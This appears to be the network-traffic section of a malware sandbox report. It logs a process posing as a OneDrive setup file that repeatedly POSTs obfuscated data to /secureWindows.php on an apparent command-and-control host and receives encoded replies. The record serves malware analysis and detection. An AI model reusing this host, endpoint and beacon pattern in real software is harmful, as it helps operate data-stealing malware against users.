                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1384321&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        117192.168.2.450118188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:46.272170067 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1312
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:46.622303963 CET1312OUTData Raw: 57 55 59 57 55 58 56 5c 58 57 50 59 55 5f 5b 5b 54 5d 5c 5c 59 5d 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYWUXV\XWPYU_[[T]\\Y]ZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_/V>_+;%3=(96/%.,[-:":/]2Y(%$+)X:* F$,Z*
                                                        Oct 30, 2024 05:23:46.879302025 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:47.091000080 CET942INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=71K%2Fj2n6%2FHCMPqXApn1LFw9n3ggjPa0h6lDuxvfMhEx%2BnbHZNH8%2FlmxEtEwb%2By1LW0SPbA7HzS64ZaNVQXziae2pjos029ftijP5M1kFApFRj%2BKoj2rJI4JAuATq%2FLt3UmLLxhRFAq4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c5af83e9ca-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1414&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1622&delivery_rate=969210&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 51 28 28 30 51 25 20 2e 11 28 02 03 10 2a 58 36 15 25 22 3c 59 32 3f 3e 5b 3c 5d 23 13 3e 24 3b 03 28 32 0a 5c 34 08 23 00 3e 2b 2f 46 0c 10 24 03 24 0b 34 0b 2b 0d 0f 1f 29 38 2b 14 20 1e 29 05 29 07 3f 1d 35 23 38 10 24 1f 35 0c 2f 3d 22 1f 2e 26 21 02 2e 0d 0d 0d 3e 00 21 57 08 14 22 5c 24 3f 3f 16 31 13 2c 59 24 21 3a 58 22 2f 20 02 22 38 22 5b 28 5d 23 0f 32 20 30 10 30 1d 0e 0a 27 39 3f 04 28 32 20 0c 26 09 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&Q((0Q% .(*X6%"<Y2?>[<]#>$;(2\4#>+/F$$4+)8+ ))?5#8$5/=".&!.>!W"\$??1,Y$!:X"/ "8"[(]#2 00'9?(2 &"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        118192.168.2.450119188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:46.388894081 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:46.839205027 CET1076OUTData Raw: 52 55 59 56 50 58 53 50 58 57 50 59 55 5b 5b 59 54 59 5c 55 59 50 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RUYVPXSPXWPYU[[YTY\UYPZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;&_(()'>7A:%71--)$Y7*?':,<%5Z38!Y/* F$,Z*)
                                                        Oct 30, 2024 05:23:46.976316929 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:47.175275087 CET790INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9zZZ5a5Lgpcr7pXCDKGE82vvHMExjBPXjnda%2BMBxIGLEdLj1XKBA2Wa2aBvTAU8uGdaN8%2B3jgIeha%2F1u1KrK1gy6hU%2FemcH4vrs9IUEa%2B7zb9awQbq74vetFAITDan3G69xrugvdx0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1c64dd36b6a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1034&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1359624&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        119192.168.2.450122188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:47.294795036 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:47.652358055 CET1076OUTData Raw: 52 53 59 57 50 58 56 55 58 57 50 59 55 5e 5b 58 54 52 5c 54 59 54 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RSYWPXVUXWPYU^[XTR\TYTZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;.^<(=0.?-5Z$>?/:$Z 82*3_)&9_3;![. F$,Z*=
                                                        Oct 30, 2024 05:23:47.893100977 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:48.209214926 CET800INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ohCcu5widASgD3be9m%2Frump%2Bv%2B%2BxM4%2FAt%2FClyEm4GY%2BAjxMrtDyzmTO2o671qnHnyMf1XuurIl9h%2F0lZDXHX1NMNChUuOQeqPuasc0YF3xdodRgx%2F%2FwabuSdcxqgfKv6EphAGtGsrzM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1cbfa5b2d39-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1163987&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        120192.168.2.450123188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:48.342348099 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:48.700654030 CET1076OUTData Raw: 57 5e 5c 51 55 5d 56 51 58 57 50 59 55 5c 5b 52 54 5b 5c 5f 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\QU]VQXWPYU\[RT[\_YPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;X<;=%><-6,&-,X/)4#7Y'94(63-Y:* F$,Z*5
                                                        Oct 30, 2024 05:23:48.933506012 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:49.145181894 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nej2EoRDe43A7qLZiQ0ndPmpLid6lx5e1U0F1eBumbRvhPAa0NcpuvRUmcUN659x2U%2F%2B7P6cpWxUUleBm35xtjqEYwmdZLGsyybJJcq6ZA%2FAfciMn2BsPYd9ibHfBFvJd23lQGQVLiM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1d27b6ee98b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1577&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1048515&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        121192.168.2.450124188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:49.657191992 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:50.012635946 CET1076OUTData Raw: 57 54 59 55 50 59 56 55 58 57 50 59 55 5e 5b 5d 54 5c 5c 5a 59 5d 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYUPYVUXWPYU^[]T\\ZY]ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;<2$=,&4^$=+-*, *&9X<653(59 F$,Z*=
                                                        Oct 30, 2024 05:23:50.241987944 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:50.456001043 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=15%2BxvmtzGPUbBSQlGzP19wDmnj8FR6Ftb410xDlhNultLZ1ve%2BA0I76H0UkGoFer4%2FQCA%2BDbTqEM4nXb3as5w6n5viOnc3jISgC8AZ0wuVxIWhIYxdaNoWpGJXCq8t21OVwbjkCJJ84%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1daaf8e28ab-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:50.456022978 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        122192.168.2.450125188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:50.594264984 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:50.949155092 CET1076OUTData Raw: 52 50 5c 50 55 5f 56 50 58 57 50 59 55 5e 5b 5b 54 5f 5c 5d 59 53 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\PU_VPXWPYU^[[T_\]YSZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,V=?(.%>7-#&=,[/Y4\81,(:0;>/: F$,Z*=
                                                        Oct 30, 2024 05:23:51.193931103 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:51.400625944 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YxjPBUiM4K5j2JedILPsHC5oXfxJeLHsS8Dqjrcxeo%2BVfrU9O%2Bd4bJ4zALSZ7CaALCNP3wuZ4ry0047q%2FL7fU7f8HiSj15XGSlK7KS7RbqdtLzU%2FbvhhzmGYOtCPjcY2oo32%2BBYejvg%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1e09ccb47a3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1794&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=834582&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        123192.168.2.450126188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:51.585913897 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:51.957238913 CET1076OUTData Raw: 57 53 5c 50 55 5e 56 5d 58 57 50 59 55 5e 5b 5e 54 5e 5c 5a 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\PU^V]XWPYU^[^T^\ZYTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- ]((]$+9\28984\ ')0(6538:: F$,Z*=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        124192.168.2.450127188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:52.121685028 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:52.480649948 CET1340OUTData Raw: 52 55 5c 52 55 55 56 51 58 57 50 59 55 5b 5b 5b 54 5e 5c 58 59 51 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RU\RUUVQXWPYU[[[T^\XYQZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/(8)3=7@.5,^2;/9<X#71_ <%\$)^.: F$,Z*)
                                                        Oct 30, 2024 05:23:52.715445995 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:52.918895960 CET939INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQPHpR5uBUdI7plxIm4dsRRLaDxN3n3i2Lvu1PO3a0pDAJNOKHsekF%2FaPZsv0hf4M7aB6O4rgc7FBVrU%2FCwqVEVOS0uZ32wX6AyREwmFuWGMLH%2FBe%2FikCajteyf5rzSLc0%2BBg8uAeow%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1ea2d154606-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1172&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1276895&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 28 01 3c 1e 25 55 36 5d 2b 12 0c 01 2a 58 2a 5e 25 22 33 05 25 3c 2a 5b 3f 02 23 1d 3d 1a 20 5e 3c 0b 28 5a 21 36 2f 06 3e 2b 2f 46 0c 10 27 13 27 1c 09 54 3f 33 2d 5a 3e 01 20 01 23 20 31 01 2a 07 37 1d 35 30 34 10 26 31 03 0e 3b 3e 21 0e 2d 35 25 06 2f 33 30 1f 3d 10 21 57 08 14 22 58 32 12 23 14 26 5b 3c 5d 25 54 22 12 23 11 3f 11 23 28 31 02 2b 5d 28 1f 26 30 16 10 33 0a 28 0d 31 00 30 18 3e 21 01 55 31 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&(<%U6]+*X*^%"3%<*[?#= ^<(Z!6/>+/F''T?3-Z> # 1*7504&1;>!-5%/30=!W"X2#&[<]%T"#?#(1+](&03(10>!U1#"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        125192.168.2.450128188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:52.348104000 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:52.704732895 CET1072OUTData Raw: 52 52 59 57 50 5f 53 56 58 57 50 59 55 58 5b 5d 54 5d 5c 5e 59 54 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYWP_SVXWPYUX[]T]\^YTZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;01(8:]0=?9\1,Y,)$[ *$&7^()$X- F$,Z*
                                                        Oct 30, 2024 05:23:52.941870928 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:53.149291039 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpf9edftnR0INSm27NkqDCTJ%2Fb6Y97d0PgDv7Z71UbNasLgfwnJa%2BHXq72o2cS1qioHl7ZP70eV6FUjOQQBzO8O50O7FHWtvC1%2FYfHRkkfV%2FhhiGXNmWwwesiXFqp219HkBNSGKcNfA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1eb8d7a6b51-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1396335&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        126192.168.2.450129188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:53.280498981 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:53.636974096 CET1076OUTData Raw: 52 52 59 52 55 58 56 56 58 57 50 59 55 5e 5b 5a 54 5d 5c 5c 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYRUXVVXWPYU^[ZT]\\YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, .^+>['-7@.6<2[0Z/X7:$2,?2$(69 F$,Z*=
                                                        Oct 30, 2024 05:23:53.877460957 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:54.084144115 CET783INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
